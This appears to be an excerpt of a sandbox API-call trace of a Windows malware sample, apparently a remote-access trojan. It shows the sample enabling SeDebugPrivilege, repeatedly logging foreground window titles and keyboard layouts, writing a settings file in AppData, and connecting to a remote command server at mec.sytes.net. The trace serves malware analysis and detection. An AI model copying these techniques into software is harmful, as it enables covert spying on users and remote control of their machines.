[0209.008] ReleaseMutex (hMutex=0x420) returned 1
[0209.008] GetLastError () returned 0x0
[0209.008] CloseHandle (hObject=0x420) returned 1
[0209.008] GetLastError () returned 0x0
[0209.008] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x255f88c, cbSid=0x19e830 | out: pSid=0x255f88c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x19e830) returned 1
[0209.008] GetLastError () returned 0x0
[0209.009] CreateMutexW (lpMutexAttributes=0x255f99c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x420
[0209.009] GetLastError () returned 0x0
[0209.009] WaitForSingleObject (hHandle=0x420, dwMilliseconds=0x1f4) returned 0x0
[0209.009] GetLastError () returned 0x0
[0209.010] ReleaseMutex (hMutex=0x420) returned 1
[0209.010] GetLastError () returned 0x0
[0209.010] CloseHandle (hObject=0x420) returned 1
[0209.010] GetLastError () returned 0x0
[0209.045] inet_addr (cp="8.8.8.8") returned 0x8080808
[0209.045] GetLastError () returned 0x0
[0209.047] inet_addr (cp="8.8.4.4") returned 0x4040808
[0209.047] GetLastError () returned 0x0
[0209.167] GetSystemInfo (in: lpSystemInfo=0x19e288 | out: lpSystemInfo=0x19e288*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5507))
[0209.167] GetLastError () returned 0x0
[0209.179] PeekMessageW (in: lpMsg=0x19f320, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f320) returned 0
[0209.237] PeekMessageW (in: lpMsg=0x19f320, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f320) returned 0
[0209.241] WaitMessage () returned 1
[0216.684] PeekMessageW (lpMsg=0x19f320, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0)
[0216.685] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x3b, wParam=0x50e, lParam=0x0) returned 0x1
[0216.686] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x11, wParam=0x0, lParam=0x0) returned 0x1
[0219.332] GetCurrentProcess () returned 0xffffffff
[0219.332] GetLastError () returned 0x0
[0219.332] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x19eaa4 | out: TokenHandle=0x19eaa4*=0x434) returned 1
[0219.333] GetLastError () returned 0x0
[0219.333] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19ea9c | out: lpLuid=0x19ea9c*(LowPart=0x14, HighPart=0)) returned 1
[0219.336] GetLastError () returned 0x0
[0219.336] AdjustTokenPrivileges (in: TokenHandle=0x434, DisableAllPrivileges=0, NewState=0x25b74cc*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0219.336] GetLastError () returned 0x0
[0219.336] CloseHandle (hObject=0x434) returned 1
[0219.336] GetLastError () returned 0x0
[0219.341] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x1d, ProcessInformation=0x19eae0, ProcessInformationLength=0x4) returned 0x0
[0219.341] GetCurrentProcess () returned 0xffffffff
[0219.341] GetLastError () returned 0x0
[0219.341] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x19eaa4 | out: TokenHandle=0x19eaa4*=0x434) returned 1
[0219.341] GetLastError () returned 0x0
[0219.341] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19ea9c | out: lpLuid=0x19ea9c*(LowPart=0x14, HighPart=0)) returned 1
[0219.342] GetLastError () returned 0x0
[0219.342] AdjustTokenPrivileges (in: TokenHandle=0x434, DisableAllPrivileges=0, NewState=0x25b74e4*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0219.342] GetLastError () returned 0x0
[0219.342] CloseHandle (hObject=0x434) returned 1
[0219.343] GetLastError () returned 0x0
[0219.738] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bin", nBufferLength=0x105, lpBuffer=0x19e5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bin", lpFilePart=0x0) returned 0x57
[0219.738] GetLastError () returned 0x0
[0219.739] SetErrorMode (uMode=0x1) returned 0x0
[0219.739] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bin" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\settings.bin"), fInfoLevelId=0x0, lpFileInformation=0x19ea74 | out: lpFileInformation=0x19ea74*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0219.739] GetLastError () returned 0x2
[0219.739] SetErrorMode (uMode=0x0) returned 0x1
[0219.740] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bin", nBufferLength=0x105, lpBuffer=0x19e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bin", lpFilePart=0x0) returned 0x57
[0219.740] GetLastError () returned 0x2
[0219.740] SetErrorMode (uMode=0x1) returned 0x0
[0219.740] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bin" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\settings.bin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x434
[0219.742] GetLastError () returned 0x0
[0219.742] GetFileType (hFile=0x434) returned 0x1
[0219.742] SetErrorMode (uMode=0x0) returned 0x1
[0219.742] GetFileType (hFile=0x434) returned 0x1
[0219.742] WriteFile (in: hFile=0x434, lpBuffer=0x25b8488*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x19ea04, lpOverlapped=0x0 | out: lpBuffer=0x25b8488*, lpNumberOfBytesWritten=0x19ea04*=0x8, lpOverlapped=0x0) returned 1
[0219.744] GetLastError () returned 0x0
[0219.744] CloseHandle (hObject=0x434) returned 1
[0219.750] GetLastError () returned 0x0
[0219.750] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bak", nBufferLength=0x105, lpBuffer=0x19e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bak", lpFilePart=0x0) returned 0x57
[0219.750] GetLastError () returned 0x0
[0219.751] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\settings.bak")) returned 0
[0219.751] GetLastError () returned 0x2
[0219.777] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x1c, wParam=0x1, lParam=0x10d4) returned 0x0
[0219.777] NtdllDefWindowProc_W (hWnd=0x4022c, Msg=0x1c, wParam=0x1, lParam=0x10d4) returned 0x0
[0219.778] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x1c, wParam=0x1, lParam=0x10d4) returned 0x0
[0219.780] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1
[0219.782] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x6, wParam=0x1, lParam=0x0) returned 0x0
[0219.802] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0
[0219.817] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0
[0219.817] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0
[0219.817] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x86, wParam=0x0, lParam=0x0) returned 0x1
[0219.819] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x6, wParam=0x0, lParam=0x0) returned 0x0
[0219.820] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x1c, wParam=0x0, lParam=0x12a8) returned 0x0
[0219.820] NtdllDefWindowProc_W (hWnd=0x4022c, Msg=0x1c, wParam=0x0, lParam=0x12a8) returned 0x0
[0219.820] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x1c, wParam=0x0, lParam=0x12a8) returned 0x0
[0219.820] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0
[0219.821] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0
[0219.822] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x282, wParam=0x1, lParam=0x0) returned 0x0
[0219.822] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x3b, wParam=0x50c, lParam=0x0)
[0219.823] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x16, wParam=0x1, lParam=0x0) returned 0x0
[0219.823] NtdllDefWindowProc_W (hWnd=0x4022c, Msg=0x16, wParam=0x1, lParam=0x0) returned 0x0
[0220.093] DestroyCursor (hCursor=0x901ab) returned 1
[0220.094] GetLastError () returned 0x0
[0221.293] GetWindowLongW (hWnd=0x4024a, nIndex=-20) returned 65792
[0221.299] DestroyWindow (hWnd=0x4024a)
[0221.299] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0
[0221.361] PostThreadMessageW (idThread=0xce0, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
[0221.363] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0
[0221.663] GetLastError () returned 0x7f
[0221.671] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x4024a, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0
[0221.675] DestroyWindow (hWnd=0x801e2)
[0221.676] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0
[0221.676] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0
[0221.677] CallWindowProcW (lpPrevWndFunc=0x772eaee0, hWnd=0x801e2, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0
Thread:
id = 106
os_tid = 0x1344
Thread:
id = 109
os_tid = 0x960
Thread:
id = 110
os_tid = 0x133c
[0197.865] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0204.777] RegCloseKey (hKey=0x2d8) returned 0x0
[0204.777] LocalFree (hMem=0x685a98) returned 0x0
[0204.777] GetLastError () returned 0x0
[0204.778] LocalFree (hMem=0x685928) returned 0x0
[0204.778] GetLastError () returned 0x0
[0204.778] CloseHandle (hObject=0x2dc) returned 1
[0204.778] GetLastError () returned 0x0
[0208.832] CloseHandle (hObject=0x404) returned 1
[0208.832] GetLastError () returned 0x0
[0208.833] CloseHandle (hObject=0x408) returned 1
[0208.833] GetLastError () returned 0x0
[0208.833] CloseHandle (hObject=0x414) returned 1
[0208.833] GetLastError () returned 0x0
[0208.834] CloseHandle (hObject=0x410) returned 1
[0208.834] GetLastError () returned 0x0
[0208.834] CloseHandle (hObject=0x3fc) returned 1
[0208.835] GetLastError () returned 0x0
[0208.835] CloseHandle (hObject=0x41c) returned 1
[0208.835] GetLastError () returned 0x0
[0208.835] CloseHandle (hObject=0x418) returned 1
[0208.835] GetLastError () returned 0x0
[0208.835] CloseHandle (hObject=0x40c) returned 1
[0208.836] GetLastError () returned 0x0
[0213.690] CloseHandle (hObject=0x410) returned 1
[0213.697] GetLastError () returned 0x0
[0213.700] CloseHandle (hObject=0x434) returned 1
[0213.700] GetLastError () returned 0x0
Thread:
id = 111
os_tid = 0xf5c
[0203.850] CoGetContextToken (in: pToken=0x507fde8 | out: pToken=0x507fde8) returned 0x0
[0203.851] CObjectContext::QueryInterface () returned 0x0
[0203.851] CObjectContext::GetCurrentThreadType () returned 0x0
[0203.851] Release () returned 0x0
[0203.851] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
Thread:
id = 112
os_tid = 0x290
[0203.910] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0204.164] GetForegroundWindow () returned 0x2007c
[0204.234] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x6ac
[0204.241] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x51cf1ec | out: lpLuid=0x51cf1ec*(LowPart=0x14, HighPart=0)) returned 1
[0204.247] GetLastError () returned 0x0
[0204.248] GetCurrentProcess () returned 0xffffffff
[0204.248] GetLastError () returned 0x0
[0204.250] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x51cf1e8 | out: TokenHandle=0x51cf1e8*=0x384) returned 1
[0204.250] GetLastError () returned 0x0
[0204.301] AdjustTokenPrivileges (in: TokenHandle=0x384, DisableAllPrivileges=0, NewState=0x24d8e2c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0204.301] GetLastError () returned 0x0
[0204.303] CloseHandle (hObject=0x384) returned 1
[0204.303] GetLastError () returned 0x0
[0204.520] EnumProcesses (in: lpidProcess=0x24da290, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x24da290, lpcbNeeded=0x51cf97c) returned 1
[0204.545] GetLastError () returned 0x0
[0204.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x34ee8b0, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x34ee8b0, ResultLength=0x51cf940*=0x17520) returned 0x0
[0204.592] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0204.598] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0205.170] GetForegroundWindow () returned 0x2007c
[0205.171] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0205.324] GetForegroundWindow () returned 0x2007c
[0205.324] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x6ac
[0205.324] EnumProcesses (in: lpidProcess=0x2507b5c, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x2507b5c, lpcbNeeded=0x51cf97c) returned 1
[0205.331] GetLastError () returned 0x0
[0205.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x350e8c0, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x350e8c0, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0205.340] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0205.340] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0205.494] GetForegroundWindow () returned 0x2007c
[0205.494] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0205.830] GetForegroundWindow () returned 0x100d4
[0205.830] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x668
[0205.830] EnumProcesses (in: lpidProcess=0x2543c7c, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x2543c7c, lpcbNeeded=0x51cf97c) returned 1
[0205.837] GetLastError () returned 0x0
[0205.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x352e8e0, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x352e8e0, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0205.849] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0205.849] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6979b8, nMaxCount=256 | out: lpString="FolderView") returned 10
[0206.059] GetForegroundWindow () returned 0x2007c
[0206.059] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0206.297] GetForegroundWindow () returned 0x2007c
[0206.297] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0206.648] GetForegroundWindow () returned 0x2007c
[0206.648] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x6ac
[0206.650] EnumProcesses (in: lpidProcess=0x25c5df4, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x25c5df4, lpcbNeeded=0x51cf97c) returned 1
[0206.729] GetLastError () returned 0x0
[0206.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x358eb60, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x358eb60, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0207.019] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0207.055] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0207.202] GetForegroundWindow () returned 0x2007c
[0207.202] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0207.439] GetForegroundWindow () returned 0x100d4
[0207.439] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x668
[0207.440] EnumProcesses (in: lpidProcess=0x25f065c, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x25f065c, lpcbNeeded=0x51cf97c) returned 1
[0207.468] GetLastError () returned 0x0
[0207.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x35aeb80, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x35aeb80, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0207.669] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0207.670] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6979b8, nMaxCount=256 | out: lpString="FolderView") returned 10
[0207.811] GetForegroundWindow () returned 0x2007c
[0207.811] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0207.967] GetForegroundWindow () returned 0x2007c
[0207.968] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0208.185] GetForegroundWindow () returned 0x2007c
[0208.185] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x6ac
[0208.195] EnumProcesses (in: lpidProcess=0x26635fc, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x26635fc, lpcbNeeded=0x51cf97c) returned 1
[0208.203] GetLastError () returned 0x0
[0208.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x360ebe0, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x360ebe0, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0208.246] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0208.255] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0208.462] GetForegroundWindow () returned 0x2007c
[0208.463] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0208.734] GetForegroundWindow () returned 0x100d4
[0208.734] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x668
[0208.735] EnumProcesses (in: lpidProcess=0x2693df8, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x2693df8, lpcbNeeded=0x51cf97c) returned 1
[0208.758] GetLastError () returned 0x0
[0208.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x362fc10, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x362fc10, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0208.844] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0208.845] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6979b8, nMaxCount=256 | out: lpString="FolderView") returned 10
[0208.848] GetForegroundWindow () returned 0x2007c
[0208.848] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x6ac
[0208.848] EnumProcesses (in: lpidProcess=0x250fcb4, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x250fcb4, lpcbNeeded=0x51cf97c) returned 1
[0208.917] GetLastError () returned 0x0
[0208.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x364fc30, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x364fc30, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0208.927] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0208.927] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0209.029] GetForegroundWindow () returned 0x2007c
[0209.029] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x6ac
[0209.030] EnumProcesses (in: lpidProcess=0x255fc28, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x255fc28, lpcbNeeded=0x51cf97c) returned 1
[0209.032] GetLastError () returned 0x0
[0209.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x368fc70, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x368fc70, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0209.041] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0209.041] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0210.157] DnsQuery_A (in: pszName="mec.sytes.net", wType=0x1, Options=0x48, pExtra=0x6979b8, ppQueryResults=0x51cfa10, pReserved=0x51cf9f0 | out: pExtra=0x6979b8, ppQueryResults=0x51cfa10*(pNext=0x0, pName="mec.sytes.net", wType=0x1, wDataLength=0x4, Flags=0x2019, dwTtl=0xf, dwReserved=0x1, Data=0x6afbc0*(IpAddress="194.5.97.210")), pReserved=0x51cf9f0*=0x0) returned 0x0
[0210.801] GetCurrentProcess () returned 0xffffffff
[0210.801] GetLastError () returned 0x3f0
[0210.801] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce36c | out: TokenHandle=0x51ce36c*=0x410) returned 1
[0210.801] GetLastError () returned 0x3f0
[0211.238] GetCurrentProcess () returned 0xffffffff
[0211.238] GetLastError () returned 0x3f0
[0211.238] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x51ce37c | out: TokenHandle=0x51ce37c*=0x434) returned 1
[0211.238] GetLastError () returned 0x3f0
[0211.411] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x438
[0211.412] GetLastError () returned 0x0
[0211.445] setsockopt (s=0x438, level=65535, optname=128, optval="\x01", optlen=4) returned 0
[0211.445] GetLastError () returned 0x0
[0211.692] bind (s=0x438, addr=0x25fceb8*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0
[0211.694] GetLastError () returned 0x0
[0211.707] WSAIoctl (in: s=0x438, dwIoControlCode=0xc8000006, lpvInBuffer=0x51cf930, cbInBuffer=0x10, lpvOutBuffer=0x51cf944, cbOutBuffer=0x4, lpcbBytesReturned=0x51cf940, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x51cf944, lpcbBytesReturned=0x51cf940, lpOverlapped=0x0) returned 0
[0211.708] GetLastError () returned 0x0
[0211.783] ConnectEx (in: s=0x438, name=0x25fcd40*(sa_family=2, sin_port=0xcbb, sin_addr="194.5.97.210"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x51cf994, lpOverlapped=0x2585ca4 | out: lpdwBytesSent=0x51cf994*=0x0) returned 0
[0211.930] GetForegroundWindow () returned 0x2007c
[0211.930] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0212.052] GetForegroundWindow () returned 0x2007c
[0212.052] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0212.191] GetForegroundWindow () returned 0x100d4
[0212.192] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x668
[0212.192] EnumProcesses (in: lpidProcess=0x2623660, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x2623660, lpcbNeeded=0x51cf97c) returned 1
[0212.214] GetLastError () returned 0x3e5
[0212.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x374fd30, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x374fd30, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0212.255] GetKeyboardLayout (idThread=0x668) returned 0x4090409
[0212.256] GetWindowTextW (in: hWnd=0x100d4, lpString=0x6979b8, nMaxCount=256 | out: lpString="FolderView") returned 10
[0212.337] GetForegroundWindow () returned 0x2007c
[0212.337] GetWindowThreadProcessId (in: hWnd=0x2007c, lpdwProcessId=0x51cf9c4 | out: lpdwProcessId=0x51cf9c4) returned 0x6ac
[0212.337] EnumProcesses (in: lpidProcess=0x2649078, cb=0x400, lpcbNeeded=0x51cf97c | out: lpidProcess=0x2649078, lpcbNeeded=0x51cf97c) returned 1
[0212.347] GetLastError () returned 0x3e5
[0212.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x376fd50, Length=0x20000, ResultLength=0x51cf940 | out: SystemInformation=0x376fd50, ResultLength=0x51cf940*=0x174e0) returned 0x0
[0212.384] GetKeyboardLayout (idThread=0x6ac) returned 0x4090409
[0212.385] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0212.542] GetForegroundWindow () returned 0x2007c
[0212.542] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0212.663] GetForegroundWindow () returned 0x2007c
[0212.663] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0212.792] GetForegroundWindow () returned 0x2007c
[0212.792] GetWindowTextW (in: hWnd=0x2007c, lpString=0x6979b8, nMaxCount=256 | out: lpString="") returned 0
[0212.990] GetForegroundWindow () returned 0x100d4
